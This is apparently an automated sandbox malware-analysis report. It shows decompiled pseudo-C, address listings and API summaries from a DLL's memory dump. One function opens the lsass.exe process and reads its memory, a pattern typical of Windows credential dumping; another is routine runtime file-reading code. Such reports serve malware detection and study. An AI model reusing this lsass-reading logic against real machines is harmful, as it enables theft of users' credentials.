					_t150 =  *0x1001f2a8; // 0x7516e4a4
					_v176 = _t150;
					if(_t150 != 0) {
						E10014010( &_v188,  &_v176, 4);
						_t221 = _v160;
						_t257 = _t257 + 4;
					}
					_t220 = 0;
					if(_v180 <= 0) {
						return _t221;
					}
					do {
						_t152 =  *0x1001f2ac; // 0x751702f8
						_v184 = 0x1001f2d0;
						_v176 = _t152 + _t220 * 8;
						_v188 =  &_v140;
						_t155 = LocalAlloc(0x40,  *_t249);
						_v168 = _t155;
						if(_t155 != 0) {
							_t157 = E10014010( &_v188,  &_v176, 4);
							_t257 = _t257 + 4;
							if(_t157 != 0) {
								_t223 = _v140;
								_v188 = _t223;
								_v184 = _v172;
								if(_t223 != _v176) {
									while(_t250 != 0) {
										_t160 = E10014010( &_v168,  &_v188,  *_t249);
										_t257 = _t257 + 4;
										if(_t160 != 0) {
											_t241 = _v168;
											_t33 =  &(_t249[1]); // 0x40
											_t34 =  &(_t249[4]); // 0x50
											_v104 =  *_t33 + _t241;
											_t252 =  *_t34 + _t241;
											_t36 =  &(_t249[2]); // 0x74
											_t37 =  &(_t249[9]); // 0x80
											_t225 =  *_t37;
											_v60 = 0;
											_v56 = 0;
											_v92 =  *((intOrPtr*)(_t241 +  *_t36));
											_t42 =  &(_t249[3]); // 0x7c
											_v136 = 0;
											_v88 =  *((intOrPtr*)(_t241 +  *_t42));
											_t46 =  &(_t249[5]); // 0x58
											_v100 = _t252;
											_v96 =  *_t46 + _t241;
											_t49 =  &(_t249[6]); // 0x90
											_v84 =  *((intOrPtr*)(_t241 +  *_t49));
											_t52 =  &(_t249[7]); // 0x70
											_v80 =  *((intOrPtr*)(_t241 +  *_t52));
											_t55 =  &(_t249[8]); // 0xc0
											_v76 =  *((intOrPtr*)(_t241 +  *_t55));
											_v72 =  *((intOrPtr*)(_t225 + _t241));
											_v68 =  *((intOrPtr*)(_t225 + _t241 + 4));
											_t63 =  &(_t249[0xa]); // 0x88
											_v64 =  *_t63 + _t241;
											_t226 =  *(_t252 + 4);
											_v132 =  &_v60;
											_t180 =  *0x1001f294; // 0xcaa50
											_v52 = _t226;
											_v48 = _t180;
											 *(_t252 + 4) = 0;
											if(_t226 != 0) {
												_t215 =  *(_t252 + 2) & 0x0000ffff;
												if(_t215 != 0) {
													_t216 = LocalAlloc(0x40, _t215);
													_v136 = _t216;
													if(_t216 != 0) {
														 *(_t252 + 4) = _t216;
														E10014010( &_v136,  &_v52,  *(_t252 + 2) & 0x0000ffff);
														_t257 = _t257 + 4;
													}
												}
											}
											_t253 = _v96;
											_v124 =  &_v44;
											_t182 =  *0x1001f294; // 0xcaa50
											_v44 = 0;
											_t227 =  *(_t253 + 4);
											_v40 = 0;
											_v128 = 0;
											_v36 = _t227;
											_v32 = _t182;
											 *(_t253 + 4) = 0;
											if(_t227 != 0) {
												_t211 =  *(_t253 + 2) & 0x0000ffff;
												if(_t211 != 0) {
													_t212 = LocalAlloc(0x40, _t211);
													_v128 = _t212;
													if(_t212 != 0) {
														 *(_t253 + 4) = _t212;
														E10014010( &_v128,  &_v36,  *(_t253 + 2) & 0x0000ffff);
														_t257 = _t257 + 4;
													}
												}
											}
											_t254 = _v64;
											_v116 =  &_v28;
											_t184 =  *0x1001f294; // 0xcaa50
											_v28 = 0;
											_t228 =  *(_t254 + 4);
											_v24 = 0;
											_v120 = 0;
											_v20 = _t228;
											_v16 = _t184;
											 *(_t254 + 4) = 0;
											if(_t228 != 0) {
												_t207 =  *(_t254 + 2) & 0x0000ffff;
												if(_t207 != 0) {
													_t208 = LocalAlloc(0x40, _t207);
													_v120 = _t208;
													if(_t208 != 0) {
														 *(_t254 + 4) = _t208;
														E10014010( &_v120,  &_v20,  *(_t254 + 2) & 0x0000ffff);
														_t257 = _t257 + 4;
													}
												}
											}
											_v12 = 0;
											_v148 =  &_v189;
											_v8 = 0;
											_v144 =  &_v12;
											_v80 = 0;
											_v156 = _v80 + 1;
											_t189 =  *0x1001f294; // 0xcaa50
											_v152 = _t189;
											_t190 = E10014010( &_v148,  &_v156, 1);
											_t257 = _t257 + 4;
											if(_t190 != 0) {
												_v156 = _v156 - 1;
												_t255 = 8 + (_v189 & 0x000000ff) * 4;
												_t205 = LocalAlloc(0x40, 8 + (_v189 & 0x000000ff) * 4);
												_v148 = _t205;
												if(_t205 != 0) {
													_v80 = _t205;
													E10014010( &_v148,  &_v156, _t255);
													_t257 = _t257 + 4;
												}
											}
											_t250 = E10012060( &_v112, _t256);
											_t231 =  *(_v108 + 4);
											if(_t231 != 0) {
												LocalFree(_t231);
											}
											_t194 =  *(_v96 + 4);
											if(_t194 != 0) {
												LocalFree(_t194);
											}
											_t196 =  *(_v64 + 4);
											if(_t196 != 0) {
												LocalFree(_t196);
											}
											_t197 = _v80;
											if(_t197 != 0) {
												LocalFree(_t197);
											}
											_t199 =  *_v168;
											_v188 = _t199;
											if(_t199 != _v176) {
												continue;
											}
										}
										goto L46;
									}
								}
							}
							L46:
							LocalFree(_v168);
						}
						_t220 = _t220 + 1;
					} while (_t220 < _v180);
					return _v160;
				}
			}



























































































    0x100120cd
    0x100120d6
    0x100120d8
    0x100120dc
    0x100120e4
    0x100120e9
    0x100120f1
    0x100120f9
    0x100120fe
    0x10012100
    0x10012106
    0x10012582
    0x1001210c
    0x1001210c
    0x10012111
    0x10012115
    0x1001211a
    0x10012127
    0x10012135
    0x10012143
    0x10012151
    0x10012169
    0x10012153
    0x10012153
    0x10012153
    0x10012145
    0x10012145
    0x10012145
    0x10012137
    0x10012137
    0x10012137
    0x10012129
    0x10012129
    0x10012129
    0x10012176
    0x10012184
    0x10012184
    0x10012187
    0x1001218c
    0x10012190
    0x10012195
    0x1001219b
    0x100121a7
    0x100121ac
    0x100121b0
    0x100121b0
    0x100121b3
    0x100121b9
    0x00000000
    0x10012576
    0x100121c0
    0x100121c0
    0x100121c7
    0x100121d4
    0x100121dc
    0x100121e0
    0x100121e6
    0x100121ec
    0x100121fc
    0x10012201
    0x10012206
    0x1001220c
    0x10012214
    0x10012218
    0x10012220
    0x10012226
    0x10012238
    0x1001223d
    0x10012242
    0x10012248
    0x1001224c
    0x10012251
    0x10012254
    0x10012258
    0x1001225a
    0x1001225d
    0x1001225d
    0x10012260
    0x1001226b
    0x10012279
    0x1001227d
    0x10012280
    0x1001228b
    0x1001228f
    0x10012294
    0x10012298
    0x1001229c
    0x100122a2
    0x100122a9
    0x100122af
    0x100122b6
    0x100122bc
    0x100122c6
    0x100122d1
    0x100122d8
    0x100122dd
    0x100122eb
    0x100122ee
    0x100122f2
    0x100122f7
    0x100122fe
    0x10012305
    0x1001230e
    0x10012310
    0x10012317
    0x1001231c
    0x10012322
    0x10012328
    0x1001232a
    0x1001233d
    0x10012342
    0x10012342
    0x10012328
    0x10012317
    0x10012345
    0x10012350
    0x10012354
    0x10012359
    0x10012364
    0x10012367
    0x10012372
    0x1001237a
    0x10012381
    0x10012388
    0x10012391
    0x10012393
    0x1001239a
    0x1001239f
    0x100123a5
    0x100123ab
    0x100123ad
    0x100123c0
    0x100123c5
    0x100123c5
    0x100123ab
    0x1001239a
    0x100123c8
    0x100123d6
    0x100123da
    0x100123df
    0x100123ea
    0x100123ed
    0x100123f8
    0x10012400
    0x10012407
    0x1001240e
    0x10012417
    0x10012419
    0x10012420
    0x10012425
    0x1001242b
    0x10012431
    0x10012433
    0x10012446
    0x1001244b
    0x1001244b
    0x10012431
    0x10012420
    0x10012452
    0x1001245d
    0x1001246c
    0x10012477
    0x10012487
    0x10012492
    0x10012496
    0x1001249d
    0x100124a1
    0x100124a6
    0x100124ab
    0x100124b2
    0x100124b6
    0x100124c0
    0x100124c6
    0x100124cc
    0x100124d3
    0x100124de
    0x100124e3
    0x100124e3
    0x100124cc
    0x100124f5
    0x100124f7
    0x100124fc
    0x100124ff
    0x100124ff
    0x10012509
    0x1001250e
    0x10012511
    0x10012511
    0x1001251e
    0x10012523
    0x10012526
    0x10012526
    0x1001252c
    0x10012535
    0x10012538
    0x10012538
    0x10012542
    0x10012544
    0x1001254c
    0x00000000
    0x00000000
    0x1001254c
    0x00000000
    0x10012242
    0x10012226
    0x10012220
    0x10012552
    0x10012556
    0x10012556
    0x1001255c
    0x1001255d
    0x10012575
    0x10012575

    APIs
      • Part of subcall function 100125F0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10012650
      • Part of subcall function 100125F0: RtlInitUnicodeString.NTDLL(?,lsass.exe), ref: 1001267B
      • Part of subcall function 100125F0: OpenProcess.KERNEL32(-00000FFF,00000000,?,?,00000001,?), ref: 100126A3
      • Part of subcall function 100125F0: GetCurrentProcess.KERNEL32(?), ref: 100126DD
      • Part of subcall function 100125F0: IsWow64Process.KERNEL32(00000000), ref: 100126E4
      • Part of subcall function 100125F0: CloseHandle.KERNEL32(00000000), ref: 100127C3
    • LocalAlloc.KERNEL32(00000040,1001A89C), ref: 100121E0
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,?), ref: 1001231C
    • LocalAlloc.KERNEL32(00000040,?), ref: 1001239F
    • LocalAlloc.KERNEL32(00000040,?), ref: 10012425
    • LocalAlloc.KERNEL32(00000040,?), ref: 100124C0
    • LocalFree.KERNEL32(00000000,?,?), ref: 100124FF
    • LocalFree.KERNEL32(00000000,?,?), ref: 10012511
    • LocalFree.KERNEL32(00000000,?,?), ref: 10012526
    • LocalFree.KERNEL32(?,?,?), ref: 10012538
    • LocalFree.KERNEL32(?), ref: 10012556
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 100125F0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 63%
    			E100125F0() {
				struct _SECURITY_ATTRIBUTES* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v24;
				char _v28;
				struct _SECURITY_ATTRIBUTES* _v32;
				long _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr* _t17;
				WCHAR* _t21;
				void* _t27;
				char _t29;
				intOrPtr _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t44;
				void* _t47;
				signed int _t48;
				long _t51;
				intOrPtr _t52;
				long _t53;
				void* _t59;

				_t47 = 0;
				_v32 = 0;
				asm("sbb esi, esi");
				_t51 = (_t48 & 0xfffff400) + 0x00001000 | 0x00000010;
				_t59 =  *0x1001f294 - _t47; // 0xcaa50
				if(_t59 != 0) {
					return 0;
				} else {
					_t17 =  *0x1001f2f8; // 0x1001a788
					_t38 = 0xc0000225;
					if( *((intOrPtr*)( *_t17))() >= 0) {
						_t21 =  *0x1001f2a4; // 0x0
						if(_t21 == 0) {
							_v8 = 0;
							_v16 =  &_v24;
							_t53 = 1;
							_v12 =  &_v28;
							RtlInitUnicodeString( &_v24, L"lsass.exe");
							if(E10014760( &_v24) < 0 || _v16 == 0) {
								goto L23;
							} else {
								_t27 = OpenProcess(_t51, 0, _v36);
								goto L7;
							}
						} else {
							_t2 = _t47 + 2; // 0x2
							_t53 = _t2;
							_t27 = CreateFileW(_t21, 0x80000000, 1, 0, 3, 0, 0);
							L7:
							_t47 = _t27;
							if(_t47 == 0 || _t47 == 0xffffffff || E10013FC0(_t47, 0x1001f294) == 0) {
								L23:
								 *0x1001f294 = 0;
								CloseHandle(_t47);
							} else {
								if(_t53 == 2) {
									_t29 = _v40;
									_t52 =  *0x1001f2a0; // 0x1db1
									_t39 =  *0x1001f29c; // 0x1
									_t44 =  *0x1001f298; // 0x6
									goto L15;
								} else {
									_t37 = GetCurrentProcess();
									__imp__IsWow64Process(_t37,  &_v40);
									_t29 = _v48;
									if(_t37 == 0 || _t29 == 0) {
										_t44 =  *0x1001f384; // 0x6
										_t39 =  *0x1001f3cc; // 0x1
										_t52 =  *0x1001f388; // 0x1db1
										 *0x1001f298 = _t44;
										 *0x1001f29c = _t39;
										 *0x1001f2a0 = _t52;
										L15:
										if(_t29 != 0) {
											goto L23;
										} else {
											asm("sbb eax, eax");
											 *0x1001e268 = _t29 + 1;
											if(_t44 >= 6) {
												L18:
												 *0x1001e40c = 1;
											} else {
												 *0x1001e40c = 0;
												if(_t39 < 2) {
													goto L18;
												}
											}
											_t40 =  *0x1001f294; // 0xcaa50
											_push(0);
											if(E100148C0(_t40, E10012590) < 0 ||  *0x1001e320 == 0 || E10012CD0(0x1001f294) == 0) {
												goto L23;
											} else {
												_t33 =  *0x1001f2f8; // 0x1001a788
												_t15 = _t33 + 8; // 0x10011860
												_t38 =  *((intOrPtr*)( *_t15))(0x1001f294, 0x1001e30c);
												if(_t38 < 0) {
													goto L23;
												}
											}
										}
									} else {
										goto L23;
									}
								}
							}
						}
					}
					return _t38;
				}
			}




























    0x100125f7
    0x10012600
    0x10012604
    0x10012612
    0x10012615
    0x1001261b
    0x100127dc
    0x10012621
    0x10012621
    0x10012626
    0x10012631
    0x10012637
    0x1001263e
    0x1001265c
    0x10012660
    0x10012664
    0x1001266d
    0x1001267b
    0x1001268c
    0x00000000
    0x1001269c
    0x100126a3
    0x00000000
    0x100126a3
    0x10012640
    0x1001264d
    0x1001264d
    0x10012650
    0x100126a9
    0x100126a9
    0x100126ad
    0x100127b8
    0x100127b9
    0x100127c3
    0x100126d3
    0x100126d6
    0x10012720
    0x10012724
    0x1001272a
    0x10012730
    0x00000000
    0x100126d8
    0x100126dd
    0x100126e4
    0x100126ec
    0x100126f0
    0x100126fa
    0x10012700
    0x10012706
    0x1001270c
    0x10012712
    0x10012718
    0x10012736
    0x10012738
    0x00000000
    0x1001273a
    0x10012740
    0x10012743
    0x1001274b
    0x1001275c
    0x1001275c
    0x1001274d
    0x1001274d
    0x1001275a
    0x00000000
    0x00000000
    0x1001275a
    0x10012766
    0x10012771
    0x1001277d
    0x00000000
    0x1001279b
    0x1001279b
    0x100127aa
    0x100127af
    0x100127b6
    0x00000000
    0x00000000
    0x100127b6
    0x1001277d
    0x00000000
    0x00000000
    0x00000000
    0x100126f0
    0x100126d6
    0x100126ad
    0x1001263e
    0x100127d2
    0x100127d2

    APIs
    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10012650
    • RtlInitUnicodeString.NTDLL(?,lsass.exe), ref: 1001267B
      • Part of subcall function 10014760: LocalFree.KERNEL32(?,?,?,-00000FFF,00000001), ref: 100147AC
    • OpenProcess.KERNEL32(-00000FFF,00000000,?,?,00000001,?), ref: 100126A3
      • Part of subcall function 10013FC0: LocalAlloc.KERNEL32(00000040,00000008,00000000,-00000FFF,100126C8,1001F294,?,00000001,?), ref: 10013FC8
      • Part of subcall function 10013FC0: LocalAlloc.KERNEL32(00000040,00000004,?,00000001,?), ref: 10013FE2
      • Part of subcall function 10013FC0: LocalFree.KERNEL32(00000001,?,00000001,?), ref: 10014004
    • GetCurrentProcess.KERNEL32(?), ref: 100126DD
    • IsWow64Process.KERNEL32(00000000), ref: 100126E4
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014976
      • Part of subcall function 100148C0: LocalAlloc.KERNEL32(00000040,?), ref: 10014A6F
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014ABD
      • Part of subcall function 100148C0: RtlInitUnicodeString.NTDLL(?,00000000), ref: 10014B53
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014B77
    • CloseHandle.KERNEL32(00000000), ref: 100127C3
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C576B4, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 300file
    C-Code - Quality: 77%
    			E00C576B4(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E00C562FF();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E00C56312())) = 9;
						L59:
						_t145 = E00C54E87();
						goto L60;
					}
					__eflags = _t213 -  *0xc6b238; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0xc6b038 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E00C561AB(_t224, _t158);
								E00C56171(0);
								E00C56171(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E00C56EB0(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0xc6b038 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0xc6b038 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0xc6b038 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xc6b038 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0xc6b038 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xc6b038 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0xc6b038 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E00C5B46E(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E00C562DC(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00C56312())) = 9;
											 *(E00C562FF()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0xc6b038 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E00C57210();
												} else {
													_t176 = E00C57520();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E00C573D0(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t104 =  &_v28; // 0xa
									_t231 =  *_t104;
									_t178 =  *((intOrPtr*)(0xc6b038 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00C56312())) = 0xc;
									 *(E00C562FF()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E00C56171(_t246);
									return _t242;
								}
							}
							L15:
							 *(E00C562FF()) =  *_t206 & _t246;
							 *((intOrPtr*)(E00C56312())) = 0x16;
							E00C54E87();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E00C562FF()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E00C56312())) = 0x16;
					goto L59;
				} else {
					 *(E00C562FF()) =  *_t212 & 0x00000000;
					_t145 = E00C56312();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































    0x00c576bd
    0x00c576c4
    0x00c576de
    0x00c576e0
    0x00c57a48
    0x00c57a48
    0x00c57a4d
    0x00c57a4d
    0x00c57a55
    0x00c57a5b
    0x00c57a5b
    0x00000000
    0x00c57a5b
    0x00c576e6
    0x00c576ec
    0x00000000
    0x00000000
    0x00c576f4
    0x00c57700
    0x00c57703
    0x00c57706
    0x00c57709
    0x00c57710
    0x00c57713
    0x00c57717
    0x00c5771a
    0x00c5771d
    0x00000000
    0x00000000
    0x00c57723
    0x00c57726
    0x00c5772c
    0x00c57746
    0x00c57748
    0x00c57a44
    0x00000000
    0x00c57a44
    0x00c5774e
    0x00c57752
    0x00000000
    0x00000000
    0x00c57758
    0x00c5775c
    0x00000000
    0x00000000
    0x00c57763
    0x00c57767
    0x00c5776a
    0x00c5776d
    0x00c57772
    0x00c57772
    0x00c57775
    0x00c57792
    0x00c57797
    0x00c57799
    0x00c5779b
    0x00c577bb
    0x00c577bc
    0x00c577be
    0x00c577c1
    0x00c577c3
    0x00c577c5
    0x00c577c7
    0x00c577c7
    0x00c577d2
    0x00c577d4
    0x00c577db
    0x00c577e0
    0x00c577e3
    0x00c577e6
    0x00c577e8
    0x00c5780d
    0x00c57812
    0x00c57819
    0x00c5781c
    0x00c5781f
    0x00c57823
    0x00c57825
    0x00c57829
    0x00c5782b
    0x00c5782e
    0x00c57831
    0x00c57833
    0x00c57836
    0x00c5783d
    0x00c57840
    0x00c57845
    0x00c57848
    0x00c57851
    0x00c57855
    0x00c57858
    0x00c5785b
    0x00c5785e
    0x00c57864
    0x00c57866
    0x00c5786f
    0x00c57872
    0x00c57875
    0x00c57878
    0x00c57879
    0x00c5787d
    0x00c57883
    0x00c5788d
    0x00c57892
    0x00c578a2
    0x00c578a6
    0x00c578a9
    0x00c578ab
    0x00c578ad
    0x00c578af
    0x00c578b1
    0x00c578b9
    0x00c578ba
    0x00c578bd
    0x00c578c0
    0x00c578c1
    0x00c578c7
    0x00c578d1
    0x00c578d9
    0x00c578dc
    0x00c578e8
    0x00c578ec
    0x00c578ef
    0x00c578f1
    0x00c578f3
    0x00c578f5
    0x00c578f7
    0x00c578ff
    0x00c57900
    0x00c57903
    0x00c57906
    0x00c57906
    0x00c57907
    0x00c5790d
    0x00c57917
    0x00c57917
    0x00c578f5
    0x00c578f1
    0x00c578dc
    0x00c578af
    0x00c578ab
    0x00c57892
    0x00c57866
    0x00c5785e
    0x00c5791d
    0x00c57923
    0x00c57925
    0x00c57998
    0x00c57998
    0x00c5799c
    0x00c579ac
    0x00c579b2
    0x00c579b4
    0x00c57a10
    0x00c57a10
    0x00c57a18
    0x00c57a19
    0x00c57a1b
    0x00c57a34
    0x00c57a37
    0x00c57974
    0x00c57975
    0x00000000
    0x00c5797a
    0x00c57a3d
    0x00000000
    0x00c57a3d
    0x00c57a22
    0x00c57a2d
    0x00000000
    0x00c57a2d
    0x00c579b6
    0x00c579b9
    0x00c579bc
    0x00000000
    0x00000000
    0x00c579be
    0x00c579be
    0x00c579c1
    0x00c579c4
    0x00c579c7
    0x00c579ce
    0x00c579d3
    0x00c579d5
    0x00c579d9
    0x00c579f4
    0x00c579f8
    0x00c579f9
    0x00c579fc
    0x00c579fd
    0x00c57a09
    0x00c579ff
    0x00c579ff
    0x00c579ff
    0x00c579db
    0x00c579db
    0x00c579db
    0x00c579e6
    0x00c579eb
    0x00c579ee
    0x00c579ee
    0x00000000
    0x00c579d3
    0x00c5792a
    0x00c5792a
    0x00c5792d
    0x00c57934
    0x00c57939
    0x00000000
    0x00000000
    0x00c57942
    0x00c57948
    0x00c5794a
    0x00000000
    0x00000000
    0x00c5794c
    0x00c57950
    0x00000000
    0x00000000
    0x00c57964
    0x00c5796a
    0x00c5796c
    0x00c57990
    0x00c57993
    0x00000000
    0x00c57993
    0x00c5796e
    0x00000000
    0x00c577ea
    0x00c577ef
    0x00c577fa
